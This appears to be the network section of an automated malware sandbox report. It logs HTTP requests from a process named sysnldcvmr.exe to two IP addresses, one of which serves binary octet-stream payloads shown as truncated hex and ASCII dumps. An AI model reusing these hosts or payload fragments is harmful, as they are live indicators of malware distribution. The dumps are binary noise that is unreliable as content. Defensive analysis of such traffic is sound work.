                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.45001791.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:42.558646917 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:57:43.928214073 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:43 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.45002491.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:46.275511980 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:57:47.642354012 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:47 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.45003691.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:49.827172995 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:57:51.151923895 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:50 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.45004791.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:53.295239925 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:57:54.672323942 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:54 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.450055185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:58.175960064 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:59.556304932 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:59 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 8960
                                                                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "671230ee-2300"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                  Nov 30, 2024 01:57:59.556432962 CET124INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TE
                                                                                                                  Nov 30, 2024 01:57:59.556634903 CET1236INData Raw: 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a bc b7 33 91 33 28 07 fa a3 3a 26 01
                                                                                                                  Data Ascii: LBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM#~Ei
                                                                                                                  Nov 30, 2024 01:57:59.556778908 CET1236INData Raw: 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9 2b 6f f9 7b 17 0e af 44 b6 38 8a 0b
                                                                                                                  Data Ascii: u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnN
                                                                                                                  Nov 30, 2024 01:57:59.556791067 CET248INData Raw: 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e 49 0f b4 a7 97 24 3f bd 72 2d 3a 50
                                                                                                                  Data Ascii: {&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9X+%
                                                                                                                  Nov 30, 2024 01:57:59.557068110 CET1236INData Raw: 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8 2f 42 72 dd 86 d8 05 a9 18 6c fe 42 37 2d 2a 59 74 3b 7c 72 a6 7f bc 53 8f 84 17 e1 ce b6 df 7b 2e cc fe ad
                                                                                                                  Data Ascii: qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#UWr|Df~Y:<@c?-G
                                                                                                                  Nov 30, 2024 01:57:59.557332993 CET224INData Raw: b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75 df 92 c7 48 7f c8 65 50 e5 64 b8 74 ba 6e 71 60 59 36 47 34 c4 89 40 bc 81 34 47 fe 22 ff eb 45 4c 97 ef 2a
                                                                                                                  Data Ascii: w1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO
                                                                                                                  Nov 30, 2024 01:57:59.557343960 CET1236INData Raw: a7 16 ed e8 db 31 d2 3e b4 8d 06 f3 89 82 e0 00 18 10 e6 b1 b2 76 dd 0c 87 c7 fc d5 16 40 07 cc 0c 4f a8 8e 3b 4b 62 19 05 aa 8c 53 a4 b9 73 20 ab dc 59 93 12 8c 9f 7f ea 55 4e ea 89 8e 37 4c b1 06 e7 27 d9 14 41 d9 87 c1 9a eb 34 cc 48 8b 74 91
                                                                                                                  Data Ascii: 1>v@O;KbSs YUN7L'A4Ht\isoh-%a~4A7n7C;0PQCgkwNz8NMxAbZYPU4]&^eqDuTbF8]UNNK4KngmqT-x9>C?EMJK
                                                                                                                  Nov 30, 2024 01:57:59.557512045 CET24INData Raw: e9 92 23 9a 54 5c df fb 40 41 24 e3 46 4d 16 2e 80 31 0d 21 e9 46 fb 57
                                                                                                                  Data Ascii: #T\@A$FM.1!FW
                                                                                                                  Nov 30, 2024 01:57:59.557533026 CET1236INData Raw: 79 e0 10 dc 1e 09 05 37 4a 4b 50 68 04 09 8c bf 03 d1 17 2c 32 57 3e c1 e9 3e 7b b2 a3 5d 10 95 a7 74 b6 bd fe c6 c9 12 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9
                                                                                                                  Data Ascii: y7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@
                                                                                                                  Nov 30, 2024 01:57:59.676512957 CET1188INData Raw: 70 91 81 19 2c 59 8e f1 0a af 73 c4 90 b3 45 dd f9 e2 6e 1b 38 f2 81 c3 da ee d3 fd 57 21 09 ae 12 41 32 4f 75 e6 60 0d 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d
                                                                                                                  Data Ascii: p,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.450066185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:02.005956888 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:03.392518997 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:03 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 10496
                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67154d18-2900"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                  Nov 30, 2024 01:58:03.392532110 CET124INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
                                                                                                                  Nov 30, 2024 01:58:03.392760038 CET1236INData Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35
                                                                                                                  Data Ascii: *B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!
                                                                                                                  Nov 30, 2024 01:58:03.392908096 CET1236INData Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65
                                                                                                                  Data Ascii: Ku"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
                                                                                                                  Nov 30, 2024 01:58:03.392918110 CET248INData Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66
                                                                                                                  Data Ascii: >"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
